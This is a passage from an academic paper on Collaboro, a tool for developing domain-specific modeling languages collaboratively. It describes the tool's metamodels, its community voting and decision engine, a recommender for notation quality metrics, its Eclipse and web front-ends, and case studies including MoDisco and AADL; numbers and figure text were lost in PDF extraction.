abstract syntax (i.e., the concepts of the dsml) and its concrete syntax (the notation to represent those concepts) elements. additionally, to improve the understanding of how changes in its definition affect the dsml, we provide a mechanism to automatically render dsml examples using the concrete syntax notation under development. abstract syntax the abstract syntax of a dsml is commonly defined by means of a metamodel written using a metamodeling language (e.g., meta-object facility (mof) (object management group, b) or ecore (steinberg et al., )). metamodeling languages normally offer a limited set of concepts to be used when creating dsml metamodels (like types, relationship or hierarchy). a dsml metamodel is then defined as an instantiation of this metamodeling concepts. figure a shows an excerpt of the well-known ecore metamodeling language, on which we rely to represent the abstract syntax of dsmls. concrete syntax regarding the concrete syntax, since the notation of a dsml is also domain-specific, to promote the discussion, we need to be able to explicitly represent the notational elements proposed for the language. thanks to this, community members will have the freedom to create a notation specially adapted to their domain, thus avoiding coupling with other existing notations (e.g., java-based textual languages or uml-like diagrams). the type of notational elements to represent largely depends on the kind of concrete syntax envisioned (textual or graphical). nowadays, there are some tool-specific metamodels to represent either graphical or textual concrete syntaxes (like the ones included in gmf (http://eclipse.org/gmf-tooling), graphiti (https://eclipse.org/graphiti) and xtext (http://eclipse.org/xtext)), or to interchange model-level diagrams (object management group, b). however, a generic metamodel covering both graphical and textual syntaxes (and combinations of both) is not typically available in other tools. therefore, we contribute in this paper our own metamodel for concrete syntaxes. figure b shows an excerpt of the core elements of this notation metamodel. as can be seen, the metamodel is not exhaustive, but it is a lightweight solution that suffices to discuss about the concrete syntax elements most commonly used in the definition of graphical, textual or hybrid concrete syntaxes (offering a good trade-off cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://eclipse.org/gmf-tooling https://eclipse.org/graphiti http://eclipse.org/xtext http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ between expressiveness and manageability of the description in order to render and analyze/recommend changes). note that, with this metamodel, it is possible to describe how to represent each language concept, thus facilitating keeping track of language notation changes. concrete syntax elements are classified following the notationelement hierarchy, which includes graphical elements (graphicalelement metaclass), textual elements (textualelement metaclass), composite elements (composite metaclass) and references to the concrete syntax of other abstract elements (syntaxof metaclass) to be used in composite patterns. the main graphical constructs are provided by the graphicalelement hierarchy, which allows referring to external pictures (external metaclass), building figures (see figure hierarchy), lines (line metaclass) and labels for the dsml elements. a label (label metaclass) serves as a container for a textual element. textual elements can be defined with the textualelement hierarchy, which includes tokens, keywords and values directly taken from the abstract syntax elements expressed in a textual form (value metaclass). it is possible to obtain the textual representation from either an attribute (attvalue metaclass) by specifying the attribute to be queried (attribute reference), or a reference (refvalue metaclass) by specifying both the reference (reference reference) and the attribute of the referred element to be used (attribute reference). the attribute separator of the value metaclass allows defining the separator for multivalued elements. the composite element can be used to define complex concrete syntax structures, allowing both graphical and textual composites but also hybrids. finally, the syntaxof metaclass allows referencing to already specified concrete syntax definitions of abstract syntax elements, thus allowing modularization and (b) (a) estructuralfeature eattribute ereference etypedelement eclassifier eclass edatatype eenum eenumliteral epackage .. ..* ..* +etype ereference <<from ecore package>> notationelement syntaxofcomposite graphicalelement x : int y : int height : int width : int labelfigure line token keyword .. ..* subelems reference id : string textualelement separator : string value refvalueattvalue .. eattribute <<from ecore package>> attribute .. ereference <<from ecore package>> reference .. text .. .. separator ..* .. ..* ..* ..* external path: string notationdefinition ..* elements ovalrectangle polygon fill : color stroke : color ..* figure excerpts of the (a) ecore and (b) notation metamodels used to represent, respectively, the abstract and concrete syntaxes of dsmls in collaboro. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ composition. the reference reference of the syntaxof metaclass specifies the reference to be queried to obtain the set of elements whereas the separator reference indicates the separator between elements. renderer the current dsml notation specification plus the set of example models for the dsml (expressed as instances of the dsml abstract syntax) can be used to generate concrete visual examples that help community members get a better idea of the language being built. we refer to this generator as renderer. the renderer takes, as inputs: ( ) the abstract and ( ) concrete syntaxes of the dsml, and ( ) the set of example models conforming to the abstract syntax; and returns a set of images representing the example models expressed according to the concrete syntax defined in the notation model (additional technical details about the render process will be given in the section describing the developed tooling). we believe the advantages of this approach is twofold. on the one hand, it is a lightweight mechanism to quickly validate the dsml without generating the dsml tooling support. on the other hand, developers and end-users participating in the collaboration can easily assess how the language looks like without the burden of dealing with the abstract and concrete syntax of dsml, which are expressed as metamodels. example figure a shows an example of the abstract syntax for the baggage claim dsml while fig. shows the notation model for the textual representation of the metaclass figure (a) textual representation example of the metaclass conveyor of the baggage claim dsml and (b) the corresponding notation model. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conveyor of such dsml (fig. a shows a textual example and fig. b shows the corresponding notation model). note that attvalue and refvalue metaclass instances are referring to elements from the abstract syntax metamodel. fig. b shows a possible renderization of a model for such language. representing the collaborations the third metamodel required in our process focuses on representing the collaborations that annotate/modify the dsml elements described before. this collaboration metamodel, which is shown in fig. , allows representing both static (e.g., change proposals) and dynamic (e.g., voting) aspects of the collaboration. being the core of our collaborative approach, we refer to this metamodel as the collaboro metamodel. static aspects similarly to how version control systems track source code, collaboro also allows representing different versions of a dsml. the versionhistory metaclass represents the set of versions (version metaclass) through which the collaboration evolves. there is always a main version history set as trunk (type attribute in versionhistory metaclass), which keeps the baseline of the collaborations about the language under development. other version histories (similar to branches) can be forked when necessary to isolate the collaboration about concrete parts of the language. different version histories can be merged into a new one (or the trunk). figure core elements of the collaboro metamodel. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ language evolution is the consequence of collaborations (collaboration metaclass). collaboro supports three types of collaborations: change proposals (proposal metaclass), solutions proposals (solution metaclass) and comments (comment metaclass). a collaboration is proposed by a user (proposedby reference) and includes an explanation (rationale attribute). a change proposal describes which language feature should be modified and contains some meta information (e.g., priority or tags). change proposals are linked to the set of solutions proposed by the community to be discussed for agreement. it is also possible to specify possible conflicts between similar proposals (e.g., the acceptance of one proposal can involve rejecting others) with the conflictwith reference. solution proposals are the answer to change proposals and describe how the language should be modified to incorporate the new features. each solution definition involves a set of add/update/delete changes on the elements of the dsml (change hierarchy). change links the collaboration metamodel with the dsml under discussion (syntaxelement metaclass), which can refer to the abstract syntax (abstractsyn taxelement metaclass) or the concrete syntax (concretesyntaxelement metaclass). the latter links (maps reference) to the abstract element to which the notation is defined. both abstractsyntaxelement and concretesyntaxelement metaclasses have a reference linking to the element which is being changed (element reference). changes in the abstract syntax are expressed in terms of the metamodeling language (i.e., emodelelement elements, which is the interface implemented by every element in the ecore metamodel) while changes in the concrete syntax are expressed in terms of elements conforming to the notation metamodel presented before. the change metaclass has a reference to the container element affected by the change (referredelement reference) and the element to change (target reference). thereby, in the case of add and delete metaclasses, referredelement reference refers to the element to which we want to add/delete a “child” element whereas target refers to the actual element to be added/deleted. in the case of the update metaclass, referredelement reference refers to the element which contains the element to be updated (e.g., a metaclass) whereas target reference refers to the new version of the element being updated (e.g., a new version for an attribute). the additional source attribute indicates the element to be updated (e.g., the attribute which is being updated). dynamic aspects during the process, community members vote collaboration elements, thus allowing to reach agreements. votes (vote metaclass) indicate whether the user (votedby reference) agrees or not with a collaboration (agreement attribute). a vote against a collaboration usually includes a comment explaining the reason of the disagreement (comment reference of vote metaclass). this comment can then be voted itself and if it is accepted by the community, the proponent of the voted proposal/solution should take such comment into account (the included attribute of comment metaclass records this fact). cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the acceptance of a proposal means that the community agrees that the requested change is necessary (accepted attribute). for each proposal we can have several solutions but in the end one of them will be selected (selected reference of the proposal metaclass) and its changes applied to the dsml definition. part of this data (like the accepted and selected properties) is automatically filled by the decision engine analyzing and resolving the collaboration. making decisions community votes are used to decide which collaborations are accepted and must be incorporated into the language. collaboration models include all the necessary information, thus allowing the automation of the decision process (i.e., approval of change proposals and selection of solutions). a decision engine can therefore apply resolution strategies (e.g., unanimous agreement, majority agreement, etc.) to deduce (and apply) the collaborations accepted by the community. as commented before, most times it is necessary to have the role of the community manager to trigger the decision process and solve possible decision locks. example as example of collaboration, we show in fig. the collaboration model which would be obtained when using collaboro to model the example discussed previously. the figure is divided in several parts according to the collaboration steps enumerated previously. for the sake of clarity, references to user metaclass instances have been represented as figure the collaboration model representing the collaborations arisen in the baggage claim dsml. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ string-based attributes and the rationale attribute is not shown. the figure shows the collaboration as an instance of the collaboro metamodel. at the tool level, we offer a user-friendly interface enabling all kinds of users to easily contribute and vote during the discussion process while the tool updates the collaboration model behind the scenes in response to the user events. part of fig. shows the collaboration model just after end-user makes the request. it includes a new proposal instance that is voted positively by the rest of the users and therefore accepted (see part ). then, a new solution is proposed by developer (see part ), which involves enriching the conveyor metaclass with a float attribute in addition to define the concrete syntax. however, this solution is not accepted by all the community members: end-user does not agree and explains his disagreement (see part ). since the comment is accepted (see part ), developer updates the solution to incorporate the community recommendations (see part ). note that the elements describing the model changes in parts and are mutually exclusive. moreover, the included attribute of the comment element in part will be activated as a consequence of the solution update. once everybody agrees on the improved solution, it is selected as the final one for the proposal (see the selected reference). now the development team can modify the dsml tooling knowing that the community needs such change and agrees on how it must be done. moreover, the rationale of the change will be tracked by the collaboration model (from which an explanation in natural language could be generated, if needed), which will allow community members to know why the conveyor metaclass was changed. metric-based recommender when developing dsmls, several quality issues regarding the abstract and concrete syntaxes can be overlooked during the collaboration. while developers are maybe the main responsibles for checking that the language is being developed properly, it is important to note that these issues may arise from both developers (e.g., they can forget defining how some concepts are represented in the notation) and end-users (e.g., they may miss that the notation is becoming too complicated for them to later being able to manage complex models). we propose to help both developers and end-users to develop better dsmls by means of a recommender engine which checks the language under development to spot possible issues and improvements. the recommender applies a set of metrics on the dsml to check its quality, in particular, to ensure that the resulting language is expressive, effective and accurate enough to be well-understood by the end-users. metrics can target both the abstract and concrete syntaxes of a dsml. concrete syntax metrics can in turn target either textual or graphical syntaxes. while several metrics for abstract and textual concrete syntaxes have been devised in previous works (cho & gray, ; aguilera, gómez & olivé, ; power & malloy, ; črepinšek et al., ), the definition and implementation of metrics for graphical concrete syntaxes is still an emerging working area. thus, in this work, we explore how metrics for abstract and concrete cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ syntaxes can be implemented in our approach, but we mainly focus on those ones regarding graphical concrete syntaxes. abstract syntax metrics the abstract syntax of a dsml is defined by a metamodel, as commented before. while the identification of proper dsml constructs (i.e., concepts and relationships) usually relies on the domain experts, identifying and solving design issues (e.g., creating hierarchies to promote extensibility or identifying patterns such as factoring attributes) is normally performed by the developers. thus, to provide consistent solutions for recurring metamodel design issues, some metrics applied to abstract syntax metamodels may offer key insights on its quality. there are currently several works providing a set of metrics for metamodels as well as for uml class diagrams that can be applied in this context (e.g., cho & gray, ; aguilera, gómez & olivé, ). as a proof of concept to evaluate the abstract syntax of dsmls in our approach, we implemented a couple of metrics that validate hierarchical structures in metamodels (inspired by aguilera, gómez & olivé ( )). thus, we consider that such structures are invalid whether either there is only one derived class or whether an inheritage is redundant (i.e., already covered by a chain of inheritage). as our approach relies on ecore, other metrics defined for this metamodeling language could be easily plugged in by using the extension mechanism provided, as we will show afterwards. concrete syntax metrics the concrete syntax of a dsml can be textual or graphical (or hybrid). as textual dsmls are usually defined by means of a grammar-based approach, which is also the case for gpls, existing support for evaluating the quality of gpls could be applied (e.g., power & malloy ( ) and črepinšek et al. ( )). apart from this gpl-related support, the current support to assess the quality of the concrete syntaxes in the dsml field is pretty limited. thus, in this paper, we apply a unifying approach to check the quality of any dsml concrete syntax (i.e., textual and/or graphical). with this purpose, we employ the set of metrics based on the cognitive dimensions framework (green, ), later formalized by moody ( ), where metrics are presented according to nine principles, namely: cognitive integration, cognitive fit, manageable complexity, perceptual discriminality, semiotic clarity, dual coding, graphic economy, visual expressiveness and semantic transparency. several works have applied them to specific dsmls (e.g., genon, heymans & amyot ( b) or le pallec & dupuy-chessa ( )). nevertheless, none of them has tried to implement such metrics in a way that can be applied generically to any dsml. as collaboro provides the required infrastructure to represent concrete syntax at a technology-agnostic level, we propose to define a set of dsml metrics adapted from moody’s principles for designing cognitively effective notations. in the following, we present how we addressed five of the nine principles to be applied to our metamodels, and we justify why the rest of the principles were discarded. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ semiotic clarity. this principle refers to the need of having a one-to-one correspondence between notation symbols and their corresponding concepts, thus maximizing precision and promoting expressiveness. we can identify four metrics according to the possible situations that could appear: ( ) symbol deficit, when a concept is not represented by a notation symbol (sometimes this situation could be evaluated positively as to avoid having too many symbols and losing visual expressiveness); ( ) symbol excess, when a notation symbol does not represent any concept; ( ) symbol redundancy, when multiple notation symbols can be used to represent a single concept; and ( ) symbol overload, when multiple concepts are represented by the same notation symbol. in collaboro, these metrics can be computed by analyzing the mapping between the abstract syntax elements and the notation model elements of the dsml (i.e., analyzing the maps reference in the concretesyntaxelement element). on the one hand, the analysis of the abstract syntax consists on a kind of flattening process where all the concepts are enriched to include the attributes and references inherited from their ancestors. the aim is to identify the dsmls elements (i.e., concept, attribute or reference) for which a concrete syntax element has to be defined. on the other hand, the analysis of the concrete syntax focuses on the discovery of symbols. when a symbol uses multiples graphical elements to be represented (e.g., using nested composite elements or syntaxof elements), they are aggregated. the result of this analysis is stored in a map that links every abstract syntax element with the corresponding concrete syntax element, thus facilitating the calculation of the previous metrics. this map will be also used in the computation of the remainder metrics. visual expressiveness. this principle refers to the number of visual variables used in the notation of a dsml. visual variables define the dimensions that can be used to create notation symbols (e.g., shape, size, color, etc.). thus, to promote its visual expressivenes, a language should use the full range and capacities of visual variables. to assess this principle, we define a metric which analyzes how visual variables are used in a dsml. the metric leverages on the previous map data structure and enriches it to include the main visual variables used in each symbol. according to the current support for visual variables of the notation metamodel (recall graphicalelement metaclass attributes), these variables include: size (height and width attributes), color (fill and stroke attributes) and shape (subclasses of graphicalelement metaclass). the metric checks the range of visual variables used in the symbols of the dsml and notifies the community when the notation should use more visual variables and/or more values of a specific visual variable to cover the full range. graphic economy. this principle states that the number of notation symbols should be cognitively manageable. note that there is not an objective rule to measure the complexity of notation elements (e.g., expert users may cognitively manage more symbols than a novice). there is the six symbol rule (miller, ) which states that there should be no more than six notation symbols if only a single visual variable is used. we therefore devised a metric based on this rule to assess the level of graphic economy in a dsml. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ perceptual discriminality. this principle states that different symbols should be clearly distinguishable from each other. discriminality is primarily determined by the visual distance between symbols, that is, the number of visual variables on which they differ and the size of these differences. this principle also states that every symbol should have at least one unique value for each visual variable used (e.g., unique colors for each symbol). thus, to assess the perceptual discriminality, we define a metric which also relies on the previous map data structure, compares each pair of symbols and calculates the visual distance between them according to the supported visual variables (i.e., number of different visual variables per pair of symbols). by default, the metric notifies the community when the average distance is lower than one, but it can be parameterized. dual coding. this principle suggests that using text and graphics together conveys the information in a more effective way. textual encoding should be then used in addition of graphical encoding to improve understanding. however, textual encoding should not be the only way to distinguish between symbols. we defined a metric that checks whether each symbol uses text and graphics elements, thus promoting dual coding. to this aim, we leverage on our notation metamodel, which allows to attach textual elements to symbols by employing label elements that contain textualelement elements. this metric notifies the community when more than a half of the symbols are not using both text and graphics. the remaining four moody’s principles were not addressed due to the reasons described below. semiotic transparency. this principle states that a notation symbol should suggest its meaning. this principle is difficult to evaluate as it relies on many parameters such as context and good practices in the specificdomain. furthermore, as the meaning of a representation is subjective, an automatic verification of this principle would be difficult to reach. complexity management. this principle refers to the ability of the notation to represent information without overloading the human mind (e.g., providing hierarchical notations). although this could be addressed in the notation model by providing mechanisms for modularization and hierarchical structuring, we believe that assessing this principle strongly depends on the profile and background of the dsml end-users and it is therefore hard to measure. cognitive integration. this principle states that the visual notation should include explicit mechanisms to support integration of information from different diagrams. in this sense, this principle refers to the results of composing different dsmls, which is not an scenario targeted by our approach. cognitive fit. this principle promotes the fact that different representations of information are suitable for different tasks and audiences (e.g., providing different concrete syntaxes for the same abstract syntax). like in the complexity management principle, assessing the cognitive fit of the notations of a dsml is directly related to the expertise of the different communities using the language, which is hard to measure with an automatic evaluation. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ recommending changes the results of the previously shown metrics provide the community developing a dsml with an important feedback to address potential improvements. in collaboro, the dsml development process incorporates a recommender that plays the role of a user in the collaborationprocess.this“recommenderuser”can checkthedifferentversionsofthedsml under development according to the previously shown metrics and propose new changes identifying the weak points to be discussed in the community. metrics can be deactivated if wished and can be given different relevance values that can also be used to sum up theresults to calculate a general value assessing the quality of the dsml under development. example in this section, we will show an example of the metrics regarding visual expressiveness and perceptual discriminatity for the baggage claim dsml. for the sake of illustration purposes, we describe these metrics on an alternative graphical syntax to the dsml, where the flight concept is represented as a poligon with the shape of an airplane, the conveyor concept is represented as a black filled-rectangle and the claims reference is represented as a line. the computation of these metrics are specially tailored to the visual variables supported by our notation metamodel. table illustrates how these two metrics are calculated. as can be seen, visual expressiveness results assess the number of different values used for each visual variable. thus, there are three out of five values for the shape dimension, two different values for the size dimension and two different values for the color dimension. on the other hand, the visual distance is calculated for each pair of symbols and measures the number of different visual variables between them. for instance, the black-filled rectangle differs in two visual variables (i.e., color and shape) with the airplane polygon; and all the supported visual variables with regard to the line. these results reveal a good visual expressiveness (good values for shape and size visual variables while the color range is appropriate for the number of symbols) and perceptual discriminality (visual distance is in average more than , where the highest value is ) therefore validating this graphical notation proposal. table example of visual expressiveness and perceptual discriminality for the baggage claim dsml. ve shape polygon rectangle line / size h: h: h: w: w: w: color fill:white fill:black fill:white / stroke:black stroke:black stroke:black pd visual distance visual distance visual distance b: a: a: c: c: b: note: ve, visual expressiveness; pd, perceptual discriminability. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ collaborative modeling in this section we will show how our approach could be easily adapted to support collaborative modeling. this adaptation is depicted in fig. . unlike the fig. , where we illustrated the process for the collaborative development of dsmls, in this case the community evaluates and discuss changes about the model being developed and not the metamodel. thus, once there is a first version of the model and a set of examples (step ), the community discusses how to improve the models (step ). the discussion arises changes and improvements, that have to be voted and eventually incorporated in the model (step ). discussion and decisions are recorded (see collaboration history), thus keeping track of the modifications performed in the model. to support this development process, the modifications to perform in the original collaboro metamodel are very small. figure shows the new metamodel to track the collaboration. as can be seen, the only changed element is the syntaxelement, which now has to refer to the main (i.e. root) metaclass of the modeling language being used to link the model elements with their metamodel definition. for instance, by default, the figure includes the element namedelement from uml, thus illustrating how collaboro could be used for the collaborative development of uml models. other languages could be supported following this same approach. tool support since the very first implementation of collaboro was released, the tool support has evolved to integrate the full set of features described in this paper . the new architecture of the developed tool is illustrated in fig. . the main functionalities of our approach are implemented by the backend (see collaboro backend), which includes specific collaborations end-users developers collaboration history evaluates<< << ch an ge s << << isstored<< << decision engine community manager drives<< << updates<< << model model instances instanceof<< << figure collaborative modeling. the tool is available at http://som- research.github.io/collaboro cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://som-research.github.io/collaboro http://som-research.github.io/collaboro http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ components for modeling both the dsml elements and the collaborations (see modeling support), rendering the notation examples (see notation renderer) making decisions (see decision engine), and recommending changes (see recommender system). as front-end for collaboro, we have developed two alternatives: ( ) a web-based front-end, which gives access to the collaboration infrastructure from any web browser; and ( ) an eclipse-based front-end, which extends the platformwithviews and editors facilitating the collaboration. next, we describe in detail each component of this architecture. collaboro backend this component provides the basic functionality to develop collaborative dsmls as explained in this paper. collaboro relies on the emf framework (steinberg et al., ) (the standard de facto modeling framework nowadays) to manage the models required during the development process. in the following, we describe the main elements of this component. proposal accepted : boolean solution comment included : boolean sols version id : string proposals collaboration id : string rationale : string user id : string proposedby metainfo priority value : int tagbased tag value : string change referredelement target add update delete vote agreement : boolean votedby selected comment metainfo ..* ..* .. .. .. votes ..* comments ..* .. .. changes ..* .. .. ..* tags source .. ..* .. .. .. .. .. .. .. .. .. ..* ..* .. collaborations votes .. versionhistory type : historytype .. .. versions historytype trunk branch previous .. .. namedelement <<from uml package>> ..* conflictwith ..* figure core elements of the adapted collaboro metamodel. figure architecture of collaboro tool support. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ modeling support collaboro provides support for managing models representing the abstract and concrete syntaxes, and the collaboration models. we implemented the metamodels described in previous sections as ecore models (the metamodeling language used in emf) and provided the required api. to support concurrent collaboration the tool can be configured to store the models in a cdo (http://www.eclipse.org/cdo) model repository. notation renderer the tool incorporates a generator which automatically creates the graphical/textual representation of the dsml example models. this component enables the lightweight creation of svg (svg, ) images from notation models to help users “see” how the notation they are discussing will look like when used to define models with that dsml. the generator analyzes each example model element, locates its abstract/concrete syntax elements and interprets the concrete syntax definition to render its textual/ graphical representation. graphicalelement and textualelement concrete syntax elements indicate the graphical or textual representation to be applied (e.g., a figure or a text field), while composite and syntaxof concrete syntax elements are used for layout and composite elements. regarding the layout of the generated graphical/textual representation, on the one hand, a block-based notation is automatically applied for textual languages, where each new composite concrete syntax element (and its contained elements) is indented. on the other hand, graphical notations are rendered following a horizontal layout, thus elements are arranged from left to right as the example model is analyzed. note that symbols acting as connectors between concepts are detected by means of the maps reference in concretesyntaxelement, thus allowing the renderer to know what concepts (and their corresponding symbols) are used as source/target elements. decision engine this component is responsible for updating the dynamic part of the collaboration models (recall the support for votes and decisions). the current support of the tool implements a total agreement strategy to infer community agreements from the voting information of the collaboration models. recommender system this component provides the required infrastructure to calculate both abstract and concrete syntaxes metrics in order to ensure their quality. the recommender is executed on demand by the community manager. the current support of the tool implements metrics to evaluate the quality of concrete graphical syntax issues. new metrics can be plugged in by extending the java elements presented in fig. . the entry point is the metric factory class, which is created for each dsml and is responsible for providing the list of available metrics. metrics have a name, a description, a dimension (e.g., each moody’s principle), an activation, a priority level and an acceptance ratio. the acceptance ratio allows specifying the maximum number of elements of syntaxes that can be wrong (e.g., not conforming to the cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://www.eclipse.org/cdo http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ metric). every metric also includes an execute() method for the recommender to compute them. this function returns a list of metricresults describing the assessment of the metric. metric results includes a status (i.e., measured in three levels), a reason describing the assessment in natural language and a ratio of fulfillment for the metric. metric results also include a list of referredelements pointing to those abstract or concrete syntaxes elements not conforming with the metrics being calculated, thus helping developers to spot the dsml elements not satisfying each metric (if any). eclipse plugin we have developed an eclipse plugin implementing the collaboro process and dsml. the plugin provides a set of new eclipse views and editors to facilitate the collaboration, which can be considered a kind of concrete syntax of collaboro itself for non-expert users. via these editors users can propose changes (to add both new abstract syntax and concrete syntax definitions to existing abstract elements) on the collaboro model that, once accepted, will update the abstract and concrete syntax models and link them together according to the selected solution. figure a includes a snapshot of the environment showing the last step of the collaboration described in previous sections. in particular, the version view lists the collaboration elements (i.e., proposals, solutions and comments) of the current version of the collaboration model. the collaboration view shows the detailed information of the selected collaboration element in the version view and a tree-based editor to indicate the changes to discuss for that element, as shown in fig. a. finally, the notation view uses the notation abstractsyntaxmetric concretesyntaxmetric concretesyntaxgraphicalmetric concretesyntaxtextualmetric metricresult status : metricresultstatus reason : string ratio : float referredelement name : string reason : referredelementreason abstractreferredelement abstractsyntaxelement : eobject concretereferredelement concretesyntaxelement : notationelement ..* .. .. ..* ..* .. metric name : string dimension : string execute() : list<metricresult> description : string acceptanceratio : integer isactive : boolean priority : metricpriority metricfactory abstractsyntax : epackage concretesyntax : definition getabstractsyntaxmetrics() getconcretesyntaxmetrics() metricpriority high normal low «enumeration» referredelementreason missing wrong «enumeration» metricresultstatus good middle bad «enumeration» figure core elements of the recommender engine. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ generator to render a full example model of the language. for instance, the notation view in figs. b and c show the notation (i.e., in textual and graphical forms, respectively) for an example model, which allowed detecting the missing attribute regarding the conveyor capacity. web-based front-end the developed web support includes two components: ( ) the server-side part, which offers a set of services to access to the main functionalities of collaboro; and the (a) (b) (c) figure (a) snapshot of the collaboro eclipse plugin. collaboro eclipse plugin with the notation view rendering the (b) textual and (c) graphical concrete syntaxes for a model. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ client-side part, which allows both end-users and developers to take part of the dsml development process from their browsers. the server-side component has been developed as a java web application which uses a set of servlets providing the required services. on the other hand, the client-side component has been developed as an angularjs-enabled website. figures and show two snapshots of the developed website. as can be seen in fig. , the website follows an arrangement similar to that one used in the eclipse plugin. thus, on top, there are two sections showing the current status of ( ) the abstract syntax of the dsml on the left and ( ) several model examples rendered with the concrete syntax definition of the dsml on the right (both sections are zoom- enabled). these sections include several pictures that can be navigated by the user (e.g., it is possible to evaluate the different example models rendered). at the bottom of the website, there are two more sections aimed at managing the collaborations, in particular, ( ) a tree including all the collaboration elements on the left and ( ) a details view on the right which shows the information of a collaboration once it is selected in the tree. furthermore, the tree view also includes buttons to create, edit and delete collaborations. figure snapshot of the collaboro web client. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the website also includes a left menu bar which allows the user to navigate through the different versions of the dsml as well as indicate some information about the recommender system status. additionally, the user can quickly see the number of issues detected by the recommender, configure the metrics (see fig. ) that have to be executed and perform the metric execution to incorporate the change proposals into the collaboration. figure snapshot of a subset of supported metrics. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ application scenarios in this section, we report the use of collaboro in two types of scenarios: ( ) the creation of new dsmls, based on two different case studies; and ( ) the extension of existing dsmls, where we describe our experience in one case study. we also mention some lessons learned in the process. developing new dsmls we used collaboro in the creation of two new dsmls: ( ) a textual dsml to define workflows and ( ) three metamodels to represent code hosting platforms in the context of a modernization process. we explain each case in the following. creating a textual dsml collaboro was used in the development of a new dsml for modisco (http://eclipse.org/ modisco), an eclipse project aimed at defining a group of tools for model-driven reverse engineering (mdre) processes. the goal of this new dsml is to facilitate the development of mdre workflows that chain several atomic reverse engineering tasks to extract the model/s of a running system. at the moment, the only way to define a mdre workflow is by using an interactive wizard. modisco users have been asking for a specific language to do the same in a more direct way, i.e., without having to go through the wizard. some years ago an initial attempt to create such language was finally abandoned but, to simplify the case study, we reused the metamodel that was proposed at the time to kickstart the process. five researchers of the team followed our collaborative process to complete/improve the abstract syntax of the dsml and create from scratch a concrete syntax for it. two of the members were part of the modisco development team so they took the role of developers in the process while the other three were only users of modisco so they adopted the role of end-users in the process. one of the members was in a different country during the collaboration so only asynchronous communication was possible. the collaboration took two weeks and resulted in two new versions of the mdre workflow language released. the first version was mainly focused on the polishment of the abstract syntax whereas the second one paid more attention to the concrete syntax (this was not enforced by us but it came out naturally). the collaboration regarding the abstract syntax involved changes in concepts and reference cardinalities, while regarding the concrete syntax, the community chose to go for a textual-based notation and mainly discussed around the best keywords or style to be used for that. defining metamodels we have also applied collaboro for defining a set of metamodels used in a model-driven re-engineering process (i.e., only the abstract syntax of the dsml was part of the experiment since the models were to be automatically created during the reverse engineering process). in particular, the process was intended to provide support for migrating google code to github projects, thus requiring the corresponding platform- specific models (psm) metamodels for both platforms, plus a platform-independent cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://eclipse.org/modisco http://eclipse.org/modisco http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ models (pim) metamodel to represent such projects at high level of abstraction (following the typical terminology defined by the model-driven architecture (mda) approach from the omg (object management group, a)). as the developers were distributed across different geographical locations, we decided to use collaboro to create the psm and pim metamodels required. six researchers geographically dispersed (i.e., the participants were part of three research groups, making three groups composed of , and researchers) collaborated in the definition of the metamodels. to kickstart the collaboration, one of the teams created a first version of each metamodel. as the collaboration was focused on defining only the abstract syntax of the language, there was no need for creating a notation model, and therefore the set of examples were rendered following a class-like diagram style. the collaboration took three weeks and resulted in two versions for each one of the psm metamodels and only one version for the pim metamodel since there the agreement was faster. extending an existing dsml more recently, we were contacted by a community member of the architecture analysis & design language (aadl) (http://www.aadl.info), and one of the lead developers in charge of defining an extension to such language. aadl is an architecture description language used in the embedded and real-time systems field. it is a textual dsml with large abstract and concrete syntaxes. the abstract syntax contains more than concepts and the concrete syntax is composed of more that elements (including keywords and tokens). the language was being extended to incorporate support for behavior specification. this extension, called aadl behavior annex (aadl-ba) (http://penelope. enst.fr/aadl/wiki/projects#aadl-ba-fronten), was being defined as a plugin enriching both the abstract and concrete syntaxes. at the time, the definition of the extension was taken care by a standarization committee open to new contributions. change proposals were informally managed by in- person voting (i.e., raising hands in a meeting) or online ballots. later, the documentation of the change proposal was spread out in a document, presentation or online wiki documentation. as explained to us by this lead developer, this process made tracking modifications very hard in the language as well as the corresponding argumentations, and he proposed to use collaboro to manage the development of the extension for aadl. as a first step, we created a fake aadl project so that this person could play around with the tool and assess its usefulness for the aadl community. the feedback was that the tool would be very useful for the project at hand if we were able to deal with some technical challenges linked to the 